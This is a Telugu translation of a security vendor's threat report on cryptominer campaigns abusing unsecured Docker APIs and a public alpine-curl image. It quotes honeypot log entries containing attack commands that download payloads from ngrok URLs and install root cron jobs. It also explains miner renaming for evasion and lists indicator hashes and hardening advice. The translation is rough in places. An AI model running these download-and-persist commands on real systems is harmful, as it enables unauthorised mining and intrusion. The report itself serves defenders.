క్రిప్టోకరెన్సీ మైనర్‌లను పంపిణీ చేయడానికి యాజమాన్యం లేని డాకర్ API మరియు సంఘం నుండి పబ్లిక్ ఇమేజ్‌లు ఎలా ఉపయోగించబడుతున్నాయి

మేము బెదిరింపులను ట్రాక్ చేయడానికి సృష్టించిన హనీపాట్ కంటైనర్‌లను ఉపయోగించి సేకరించిన డేటాను విశ్లేషించాము. మరియు మేము డాకర్ హబ్‌లో కమ్యూనిటీ ప్రచురించిన చిత్రాన్ని ఉపయోగించి అవాంఛిత లేదా అనధికార క్రిప్టోకరెన్సీ మైనర్‌ల నుండి రోగ్ కంటైనర్‌ల వలె ముఖ్యమైన కార్యాచరణను గుర్తించాము. హానికరమైన క్రిప్టోకరెన్సీ మైనర్‌లను అందించే సేవలో భాగంగా చిత్రం ఉపయోగించబడుతుంది.

అదనంగా, నెట్‌వర్క్‌లతో పని చేసే ప్రోగ్రామ్‌లు ఓపెన్ పొరుగు కంటైనర్‌లు మరియు అప్లికేషన్‌లను చొచ్చుకుపోయేలా ఇన్‌స్టాల్ చేయబడతాయి.

మేము మా హనీపాట్‌లను అలాగే వదిలివేస్తాము, అంటే డిఫాల్ట్ సెట్టింగ్‌లతో, ఎటువంటి భద్రతా చర్యలు లేకుండా లేదా తదుపరి అదనపు సాఫ్ట్‌వేర్ ఇన్‌స్టాలేషన్ లేకుండా. లోపాలు మరియు సాధారణ దుర్బలత్వాలను నివారించడానికి డాకర్ ప్రారంభ సెటప్ కోసం సిఫార్సులను కలిగి ఉందని దయచేసి గమనించండి. కానీ ఉపయోగించిన హనీపాట్‌లు కంటైనర్‌లు, కంటైనర్ ప్లాట్‌ఫారమ్‌ను లక్ష్యంగా చేసుకుని దాడులను గుర్తించడానికి రూపొందించబడ్డాయి, కంటైనర్‌లలోని అప్లికేషన్‌లు కాదు.

గుర్తించబడిన హానికరమైన కార్యకలాపం కూడా గుర్తించదగినది ఎందుకంటే దీనికి దుర్బలత్వాలు అవసరం లేదు మరియు డాకర్ వెర్షన్ నుండి స్వతంత్రంగా ఉంటుంది. తప్పుగా కాన్ఫిగర్ చేయబడిన, అందువల్ల ఓపెన్, కంటైనర్ ఇమేజ్‌ని కనుగొనడం దాడి చేసేవారు అనేక ఓపెన్ సర్వర్‌లను ఇన్‌ఫెక్ట్ చేయడానికి అవసరం.

అన్‌క్లోజ్డ్ డాకర్ API వినియోగదారుని విస్తృత శ్రేణిని నిర్వహించడానికి అనుమతిస్తుంది జట్లు, నడుస్తున్న కంటైనర్‌ల జాబితాను పొందడం, నిర్దిష్ట కంటైనర్ నుండి లాగ్‌లను పొందడం, ప్రారంభించడం, నిలిపివేయడం (బలవంతంగా సహా) మరియు నిర్దిష్ట సెట్టింగ్‌లతో నిర్దిష్ట చిత్రం నుండి కొత్త కంటైనర్‌ను సృష్టించడం వంటి వాటితో సహా.

ఎడమవైపు మాల్వేర్ డెలివరీ పద్ధతి ఉంది. కుడి వైపున దాడి చేసేవారి పర్యావరణం ఉంది, ఇది చిత్రాల నుండి రిమోట్ రోలింగ్‌ను అనుమతిస్తుంది.

3762 ఓపెన్ డాకర్ APIల దేశం వారీగా పంపిణీ. 12.02.2019/XNUMX/XNUMX నాటి షోడాన్ శోధన ఆధారంగా

దాడి గొలుసు మరియు పేలోడ్ ఎంపికలు

హానికరమైన కార్యాచరణ హనీపాట్‌ల సహాయంతో మాత్రమే కనుగొనబడింది. Monero క్రిప్టోకరెన్సీ మైనింగ్ సాఫ్ట్‌వేర్‌ని అమలు చేయడానికి వంతెనగా ఉపయోగించిన తప్పుగా కాన్ఫిగర్ చేయబడిన కంటైనర్‌ను మేము పరిశోధించినప్పటి నుండి బహిర్గతమైన డాకర్ APIల సంఖ్య (రెండవ గ్రాఫ్ చూడండి) పెరిగినట్లు షోడాన్ నుండి డేటా చూపిస్తుంది. గత సంవత్సరం అక్టోబర్‌లో (2018, ప్రస్తుత డేటా మీరు ఇలా చూడవచ్చు సుమారు అనువాదకుడు) 856 ఓపెన్ APIలు మాత్రమే ఉన్నాయి.

హనీపాట్ లాగ్‌ల పరిశీలనలో కంటైనర్ ఇమేజ్ వినియోగం కూడా ఉపయోగంతో ముడిపడి ఉందని తేలింది ngrok, సురక్షిత కనెక్షన్‌లను ఏర్పాటు చేయడానికి లేదా పబ్లిక్‌గా యాక్సెస్ చేయగల పాయింట్‌ల నుండి నిర్దిష్ట చిరునామాలు లేదా వనరులకు ట్రాఫిక్‌ను ఫార్వార్డ్ చేయడానికి ఒక సాధనం (ఉదాహరణకు లోకల్ హోస్ట్). ఇది ఓపెన్ సర్వర్‌కు పేలోడ్‌ను డెలివరీ చేసేటప్పుడు దాడి చేసేవారిని డైనమిక్‌గా URLలను సృష్టించడానికి అనుమతిస్తుంది. ngrok సేవ యొక్క దుర్వినియోగాన్ని చూపుతున్న లాగ్‌ల నుండి కోడ్ ఉదాహరణలు క్రింద ఉన్నాయి:

Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,

Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

మీరు గమనిస్తే, అప్‌లోడ్ చేయబడిన ఫైల్‌లు నిరంతరం మారుతున్న URLల నుండి డౌన్‌లోడ్ చేయబడతాయి. ఈ URLలు తక్కువ గడువు తేదీని కలిగి ఉంటాయి, కాబట్టి గడువు తేదీ తర్వాత పేలోడ్‌లు డౌన్‌లోడ్ చేయబడవు.

రెండు పేలోడ్ ఎంపికలు ఉన్నాయి. మొదటిది Linux కోసం సంకలనం చేయబడిన ELF మైనర్ (Coinminer.SH.MALXMR.ATNOగా నిర్వచించబడింది) ఇది మైనింగ్ పూల్‌కి కనెక్ట్ అవుతుంది. రెండవది స్క్రిప్ట్ (TrojanSpy.SH.ZNETMAP.A) నెట్‌వర్క్ పరిధులను స్కాన్ చేయడానికి మరియు కొత్త లక్ష్యాల కోసం శోధించడానికి ఉపయోగించే నిర్దిష్ట నెట్‌వర్క్ సాధనాలను పొందేందుకు రూపొందించబడింది.

డ్రాపర్ స్క్రిప్ట్ రెండు వేరియబుల్స్‌ను సెట్ చేస్తుంది, అవి క్రిప్టోకరెన్సీ మైనర్‌ను అమలు చేయడానికి ఉపయోగించబడతాయి. HOST వేరియబుల్ హానికరమైన ఫైల్‌లు ఉన్న URLని కలిగి ఉంటుంది మరియు RIP వేరియబుల్ అనేది మైనర్ యొక్క ఫైల్ పేరు (వాస్తవానికి, హాష్). హాష్ వేరియబుల్ మారిన ప్రతిసారీ HOST వేరియబుల్ మారుతుంది. దాడి చేయబడిన సర్వర్‌లో ఇతర క్రిప్టోకరెన్సీ మైనర్లు అమలు చేయడం లేదని కూడా స్క్రిప్ట్ తనిఖీ చేయడానికి ప్రయత్నిస్తుంది.

HOST మరియు RIP వేరియబుల్స్‌కి ఉదాహరణలు, అలాగే ఇతర మైనర్లు అమలు చేయడం లేదని తనిఖీ చేయడానికి ఉపయోగించే కోడ్ స్నిప్పెట్

మైనర్‌ను ప్రారంభించే ముందు, దాని పేరు nginx గా మార్చబడింది. ఈ స్క్రిప్ట్ యొక్క ఇతర సంస్కరణలు Linux పరిసరాలలో ఉండే ఇతర చట్టబద్ధమైన సేవలకు మైనర్ పేరును మారుస్తాయి. నడుస్తున్న ప్రక్రియల జాబితాకు వ్యతిరేకంగా తనిఖీలను దాటవేయడానికి ఇది సాధారణంగా సరిపోతుంది.

శోధన స్క్రిప్ట్ కూడా లక్షణాలను కలిగి ఉంది. అవసరమైన సాధనాలను అమలు చేయడానికి ఇది అదే URL సేవతో పని చేస్తుంది. వాటిలో zmap బైనరీ ఉంది, ఇది నెట్‌వర్క్‌లను స్కాన్ చేయడానికి మరియు ఓపెన్ పోర్ట్‌ల జాబితాను పొందేందుకు ఉపయోగించబడుతుంది. స్క్రిప్ట్ కనుగొనబడిన సేవలతో పరస్పర చర్య చేయడానికి మరియు కనుగొనబడిన సేవ గురించి అదనపు సమాచారాన్ని (ఉదాహరణకు, దాని సంస్కరణ) గుర్తించడానికి వాటి నుండి బ్యానర్‌లను స్వీకరించడానికి ఉపయోగించే మరొక బైనరీని కూడా లోడ్ చేస్తుంది.

స్కాన్ చేయడానికి స్క్రిప్ట్ కొన్ని నెట్‌వర్క్ పరిధులను ముందే నిర్ణయిస్తుంది, అయితే ఇది స్క్రిప్ట్ వెర్షన్‌పై ఆధారపడి ఉంటుంది. ఇది స్కాన్‌ను అమలు చేయడానికి ముందు సేవల నుండి లక్ష్య పోర్ట్‌లను కూడా సెట్ చేస్తుంది-ఈ సందర్భంలో, డాకర్.

సాధ్యమైన లక్ష్యాలు కనుగొనబడిన వెంటనే, బ్యానర్‌లు వాటి నుండి స్వయంచాలకంగా తీసివేయబడతాయి. స్క్రిప్ట్ సేవలు, అప్లికేషన్‌లు, భాగాలు లేదా ఆసక్తి ఉన్న ప్లాట్‌ఫారమ్‌లపై ఆధారపడి లక్ష్యాలను ఫిల్టర్ చేస్తుంది: Redis, Jenkins, Drupal, MODX, కుబెర్నెటెస్ మాస్టర్, డాకర్ 1.16 క్లయింట్ మరియు Apache CouchDB. స్కాన్ చేయబడిన సర్వర్ వాటిలో దేనికైనా సరిపోలితే, అది టెక్స్ట్ ఫైల్‌లో సేవ్ చేయబడుతుంది, దాడి చేసేవారు తదుపరి విశ్లేషణ మరియు హ్యాకింగ్ కోసం దీనిని ఉపయోగించవచ్చు. ఈ టెక్స్ట్ ఫైల్‌లు డైనమిక్ లింక్‌ల ద్వారా దాడి చేసేవారి సర్వర్‌లకు అప్‌లోడ్ చేయబడతాయి. అంటే, ప్రతి ఫైల్‌కు ప్రత్యేక URL ఉపయోగించబడుతుంది, అంటే తదుపరి యాక్సెస్ కష్టం.

దాడి వెక్టర్ ఒక డాకర్ చిత్రం, ఇది కోడ్ యొక్క తదుపరి రెండు ముక్కలలో చూడవచ్చు.

ఎగువన చట్టబద్ధమైన సేవకు పేరు మార్చబడుతుంది మరియు దిగువన నెట్‌వర్క్‌లను స్కాన్ చేయడానికి zmap ఎలా ఉపయోగించబడుతుంది

ఎగువన ముందే నిర్వచించబడిన నెట్‌వర్క్ పరిధులు ఉన్నాయి, దిగువన డాకర్‌తో సహా సేవల కోసం శోధించడానికి నిర్దిష్ట పోర్ట్‌లు ఉన్నాయి.

ఆల్పైన్-కర్ల్ చిత్రం 10 మిలియన్ కంటే ఎక్కువ సార్లు డౌన్‌లోడ్ చేయబడిందని స్క్రీన్‌షాట్ చూపిస్తుంది

ఆల్పైన్ లైనక్స్ మరియు కర్ల్ ఆధారంగా, వివిధ ప్రోటోకాల్‌ల ద్వారా ఫైల్‌లను బదిలీ చేయడానికి వనరు-సమర్థవంతమైన CLI సాధనం, మీరు నిర్మించవచ్చు. డాకర్ చిత్రం. మీరు మునుపటి చిత్రంలో చూడగలిగినట్లుగా, ఈ చిత్రం ఇప్పటికే 10 మిలియన్ కంటే ఎక్కువ సార్లు డౌన్‌లోడ్ చేయబడింది. అధిక సంఖ్యలో డౌన్‌లోడ్‌లు అంటే ఈ చిత్రాన్ని ఎంట్రీ పాయింట్‌గా ఉపయోగించడం కావచ్చు; ఈ చిత్రం ఆరు నెలల క్రితం నవీకరించబడింది; వినియోగదారులు ఈ రిపోజిటరీ నుండి ఇతర చిత్రాలను తరచుగా డౌన్‌లోడ్ చేయలేదు. డాకర్‌లో ప్రవేశ స్థానం - కంటైనర్‌ను అమలు చేయడానికి కాన్ఫిగర్ చేయడానికి ఉపయోగించే సూచనల సమితి. ఎంట్రీ పాయింట్ సెట్టింగ్‌లు తప్పుగా ఉంటే (ఉదాహరణకు, కంటైనర్ ఇంటర్నెట్ నుండి తెరిచి ఉంచబడుతుంది), చిత్రాన్ని దాడి వెక్టర్‌గా ఉపయోగించవచ్చు. దాడి చేసేవారు తప్పుగా కాన్ఫిగర్ చేయబడిన లేదా తెరిచిన కంటైనర్‌ను సపోర్ట్ చేయకుండా వదిలేస్తే పేలోడ్‌ని డెలివరీ చేయడానికి దాన్ని ఉపయోగించవచ్చు.

ఈ చిత్రం (ఆల్పైన్-కర్ల్) కూడా హానికరమైనది కాదని గమనించడం ముఖ్యం, కానీ మీరు పైన చూడగలిగినట్లుగా, ఇది హానికరమైన విధులను నిర్వహించడానికి ఉపయోగించవచ్చు. హానికరమైన కార్యకలాపాలను నిర్వహించడానికి ఇలాంటి డాకర్ చిత్రాలు కూడా ఉపయోగించబడతాయి. మేము డాకర్‌ని సంప్రదించి, ఈ సమస్యపై వారితో కలిసి పనిచేశాము.

సిఫార్సులు

సరికాని సెట్టింగ్ అవశేషాలు స్థిరమైన సమస్య చాలా కంపెనీలకు, ముఖ్యంగా అమలు చేస్తున్న వారికి DevOps, వేగవంతమైన అభివృద్ధి మరియు డెలివరీపై దృష్టి పెట్టింది. ఆడిటింగ్ మరియు మానిటరింగ్ నియమాలను పాటించాల్సిన అవసరం, డేటా గోప్యతను పర్యవేక్షించాల్సిన అవసరం, అలాగే అవి పాటించకపోవడం వల్ల కలిగే అపారమైన నష్టం వల్ల ప్రతిదీ తీవ్రమవుతుంది. డెవలప్‌మెంట్ లైఫ్‌సైకిల్‌లో సెక్యూరిటీ ఆటోమేషన్‌ను చేర్చడం వలన మీరు గుర్తించబడని భద్రతా రంధ్రాలను కనుగొనడంలో సహాయపడటమే కాకుండా, కనుగొనబడిన ప్రతి దుర్బలత్వానికి అదనపు సాఫ్ట్‌వేర్ బిల్డ్‌లను అమలు చేయడం లేదా అప్లికేషన్‌ని అమలు చేసిన తర్వాత తప్పుగా కాన్ఫిగరేషన్ చేయడం వంటి అనవసరమైన పనిభారాన్ని తగ్గించడంలో కూడా ఇది మీకు సహాయపడుతుంది.

ఈ కథనంలో చర్చించిన సంఘటన కింది సిఫార్సులతో సహా మొదటి నుండి భద్రతను పరిగణనలోకి తీసుకోవాల్సిన అవసరాన్ని హైలైట్ చేస్తుంది:

• సిస్టమ్ నిర్వాహకులు మరియు డెవలపర్‌ల కోసం: నిర్దిష్ట సర్వర్ లేదా అంతర్గత నెట్‌వర్క్ నుండి అభ్యర్థనలను మాత్రమే ఆమోదించడానికి ప్రతిదీ కాన్ఫిగర్ చేయబడిందని నిర్ధారించుకోవడానికి ఎల్లప్పుడూ మీ API సెట్టింగ్‌లను తనిఖీ చేయండి.
• కనీస హక్కుల సూత్రాన్ని అనుసరించండి: కంటైనర్ చిత్రాలు సంతకం చేయబడి మరియు ధృవీకరించబడిందని నిర్ధారించుకోండి, క్లిష్టమైన భాగాలకు (కంటైనర్ లాంచ్ సర్వీస్) యాక్సెస్‌ను పరిమితం చేయండి మరియు నెట్‌వర్క్ కనెక్షన్‌లకు ఎన్‌క్రిప్షన్‌ను జోడించండి.
• అనుసరించండి సిఫార్సులు మరియు భద్రతా విధానాలను ప్రారంభించండి, ఉదా. డాకర్ నుండి మరియు అంతర్నిర్మిత భద్రతా లక్షణాలు.
• కంటైనర్‌లో నడుస్తున్న ప్రక్రియల గురించి అదనపు సమాచారాన్ని పొందడానికి రన్‌టైమ్‌లు మరియు చిత్రాల స్వయంచాలక స్కానింగ్‌ను ఉపయోగించండి (ఉదాహరణకు, స్పూఫింగ్‌ను గుర్తించడానికి లేదా దుర్బలత్వాలను శోధించడానికి). అప్లికేషన్ నియంత్రణ మరియు సమగ్రత పర్యవేక్షణ సర్వర్‌లు, ఫైల్‌లు మరియు సిస్టమ్ ప్రాంతాలకు అసాధారణ మార్పులను ట్రాక్ చేయడంలో సహాయపడతాయి.

Trendmicro DevOps బృందాలు సురక్షితంగా నిర్మించడానికి, త్వరగా విడుదల చేయడానికి మరియు ఎక్కడైనా ప్రారంభించడంలో సహాయపడుతుంది. ట్రెండ్ మైక్రో హైబ్రిడ్ క్లౌడ్ సెక్యూరిటీ సంస్థ యొక్క DevOps పైప్‌లైన్‌లో శక్తివంతమైన, క్రమబద్ధీకరించబడిన మరియు స్వయంచాలక భద్రతను అందిస్తుంది మరియు బహుళ ముప్పు రక్షణలను అందిస్తుంది XGen రన్‌టైమ్‌లో భౌతిక, వర్చువల్ మరియు క్లౌడ్ వర్క్‌లోడ్‌లను రక్షించడానికి. ఇది కంటైనర్ భద్రతను కూడా జోడిస్తుంది లోతైన భద్రత и డీప్ సెక్యూరిటీ స్మార్ట్ చెక్, ఇది డెవలప్‌మెంట్ పైప్‌లైన్‌లో ఏ సమయంలోనైనా మాల్వేర్ మరియు దుర్బలత్వాల కోసం డాకర్ కంటైనర్ చిత్రాలను స్కాన్ చేస్తుంది, వాటిని అమలు చేయడానికి ముందు బెదిరింపులను నివారించడానికి.

రాజీ సంకేతాలు

సంబంధిత హాష్‌లు:

• 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
• f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)

ఆఫ్ డాకర్ వీడియో కోర్సు ప్రాక్టీస్ చేసే స్పీకర్లు సంభావ్యతను తగ్గించడానికి లేదా పైన వివరించిన పరిస్థితిని పూర్తిగా నివారించడానికి ముందుగా ఏ సెట్టింగ్‌లు చేయాలో చూపుతాయి. మరియు ఆగస్టు 19-21 తేదీలలో ఆన్‌లైన్ ఇంటెన్సివ్‌లో DevOps సాధనాలు & చీట్స్ మీరు ఇలాంటి భద్రతా సమస్యలను సహోద్యోగులతో మరియు ప్రాక్టీస్ చేసే ఉపాధ్యాయులతో రౌండ్ టేబుల్‌లో చర్చించవచ్చు, ఇక్కడ ప్రతి ఒక్కరూ మాట్లాడవచ్చు మరియు అనుభవజ్ఞులైన సహోద్యోగుల బాధలు మరియు విజయాలను వినవచ్చు.

మూలం: www.habr.com